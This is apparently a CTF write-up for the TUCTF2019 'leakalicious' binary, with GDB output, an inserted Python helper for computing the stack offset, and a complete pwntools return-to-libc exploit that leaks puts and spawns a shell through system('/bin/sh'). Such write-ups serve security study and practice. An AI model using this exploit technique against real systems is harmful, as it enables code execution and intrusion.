
TUCTF2019 leakalicious writeup

nroses-taek 2019. 12. 7. 18:15

<leakalicious>

 

Description

King Arthur has proposed this challenge for all those who consider themselves worthy.

 

Hint

BLUKAT ME! If only we knew what libc to use...


Let's pwn 🙂

 

 

First, we cannot use shellcode.

But I found a hint in IDA, a string in the binary:

What... version of libc am I using?

 

So I decided to use return-to-libc (RTL).

Then let's put together the pieces for the attack.

 

If we send 'A' 31 times, we can leak the address of the puts function.
Next, we need to know the distance from the buffer to the return address (RET).
We set two breakpoints in GDB:

  1. at the starting point of the function

  2. right after the read function

gdb-peda$ i r esp

esp            0xffffd41c    0xffffd41c

 

gdb-peda$ x/40wx $esp

0xffffd3e4:    0x00000000    0xffffd3f0    0x00000040    0x41414141

0xffffd3f4:    0x41414141    0xffff0a41    0x565562ab    0xf7fe59b0

 

gdb-peda$ p/d 0xffffd41c - 0xffffd3f0

$3 = 44
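As an added example (not part of the original writeup), a small Python helper that recovers the buffer-to-RET distance from GDB output like the one above by locating the first 0x41414141 dword, and that sanity-checks a recovered libc base for page alignment. The stack dump and esp value are re-typed from this page; the leak value used in the alignment check is constructed.

```python
import re

# Constructed sample: the two GDB snippets from the writeup, re-typed inline.
ESP_AT_ENTRY = 0xffffd41c   # `i r esp` at the first breakpoint (function entry)
STACK_DUMP = """\
0xffffd3e4:    0x00000000    0xffffd3f0    0x00000040    0x41414141
0xffffd3f4:    0x41414141    0xffff0a41    0x565562ab    0xf7fe59b0
"""

DUMP_LINE = re.compile(r'^(0x[0-9a-f]+):((?:\s+0x[0-9a-f]{8})+)\s*$', re.I)

def parse_dump(text):
    """Turn `x/Nwx` output into a list of (address, dword) pairs."""
    cells = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue                     # skip prompts and blank lines
        base = int(m.group(1), 16)
        for i, word in enumerate(m.group(2).split()):
            cells.append((base + 4 * i, int(word, 16)))
    return cells

def find_buffer_start(text, marker=0x41414141):
    """Address of the first dword consisting entirely of the marker pattern
    ('AAAA'), i.e. where our input landed on the stack."""
    for addr, word in parse_dump(text):
        if word == marker:
            return addr
    raise ValueError("marker not found in dump")

def offset_to_ret(esp_at_entry, buf_addr):
    """As in the writeup, esp at the first breakpoint points at the slot that
    holds the saved return address, so the distance is a plain subtraction."""
    return esp_at_entry - buf_addr

def libc_base_from_leak(leaked_puts, puts_offset):
    """Recover the libc base from a leaked puts address and check that it is
    page aligned; a mis-sliced leak or a wrong libc build usually fails this."""
    base = leaked_puts - puts_offset
    if base & 0xfff:
        raise ValueError("libc base 0x%x is not page aligned: bad leak or wrong libc" % base)
    return base

if __name__ == "__main__":
    buf = find_buffer_start(STACK_DUMP)
    print("buffer at 0x%x, offset to RET = %d" % (buf, offset_to_ret(ESP_AT_ENTRY, buf)))
```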

 

 

exploit

from pwn import *

libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')    # my library
r = process("./leakalicious")

# 31 'A's fill the buffer so the following output leaks the puts address
r.sendlineafter(b'> ', b'A' * 31)
print(r.recvline())

libc_base = u32(r.recvline()[:-2]) - libc.symbols['puts']
log.info("libc_base is : " + str(hex(libc_base)))

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

log.info('system addr is : ' + hex(system_addr))
log.info('/bin/sh addr is ' + hex(binsh_addr))

r.sendlineafter(b'> ', b'A')
# 44 bytes to RET, then system(), a dummy return address, then the '/bin/sh' pointer
r.sendlineafter(b'> ', b'A' * 44 + p32(system_addr) + b'A' * 4 + p32(binsh_addr))

r.interactive()